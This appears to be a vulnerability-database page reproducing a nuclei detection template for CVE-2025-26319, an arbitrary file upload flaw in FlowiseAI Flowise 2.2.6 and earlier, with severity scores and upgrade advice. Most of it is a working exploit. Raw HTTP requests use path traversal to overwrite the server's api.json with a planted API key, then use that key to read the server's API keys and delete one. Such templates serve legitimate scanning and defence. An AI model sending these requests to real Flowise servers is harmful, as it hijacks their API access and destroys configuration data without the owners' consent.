Lucene search
K

FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

FlowiseAI versions 2.2.6 and below suffer from an arbitrary file upload vulnerability.

Related
Refs
Code
id: CVE-2025-26319

info:
  name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
  impact: |
    Unauthenticated attackers can exploit path traversal in file uploads to overwrite the api.json configuration file, potentially exposing API keys and achieving remote code execution.
  remediation: |
    Upgrade to FlowiseAI Flowise version 2.2.7 or later that properly validates file upload paths.
  reference:
    - https://github.com/advisories/GHSA-69jq-qr7w-j7qh
    - https://github.com/FlowiseAI/Flowise
    - https://nvd.nist.gov/vuln/detail/CVE-2025-26319
  classification:
    epss-score: 0.50789
    epss-percentile: 0.98789
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-26319
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: FlowiseAI
    product: Flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
  tags: cve,cve2025,flowise,fileupload,intrusive,vkev,vuln,ai

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2froot%2f/.flowise HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydTh0yj8zypRgPT1w

        ------WebKitFormBoundarydTh0yj8zypRgPT1w
        Content-Disposition: form-data; name="files";filename="api.json"
        Content-type: text/plain

        [{
        "keyName":"=",
        "apiKey":"24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ",
        "apiSecret":"8648f55db62716a6577b565efb66145b9ad8c50884c57ae8d4f03c4cd8b3ee27b1f77804d320f08bac8aa4b0dbf58a39dacbb767eb05efe1e57d5c66e5d48473.af4b3f229bd11ac5",
        "createdAt":"111",
        "id":"1111"
        }]
        ------WebKitFormBoundarydTh0yj8zypRgPT1w--

    matchers:
      - type: word
        part: body
        words:
          - 'name":'
          - 'mimeType":"text/plain'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/v1/apikey HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

      - |
        DELETE /api/v1/apikey/1111 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'apiKey":"'
          - 'apiSecret":'
          - 'chatFlows'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022044be5a31f9b5273199f2d1e40378da803d05b25ba2a5b89ce9372ff43ee5b9d0022100fae58b1d0074efb996b51c48e5ff456d461a33cb0f80ab501018025be2e28c83:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.8
EPSS0.50789
SSVC
41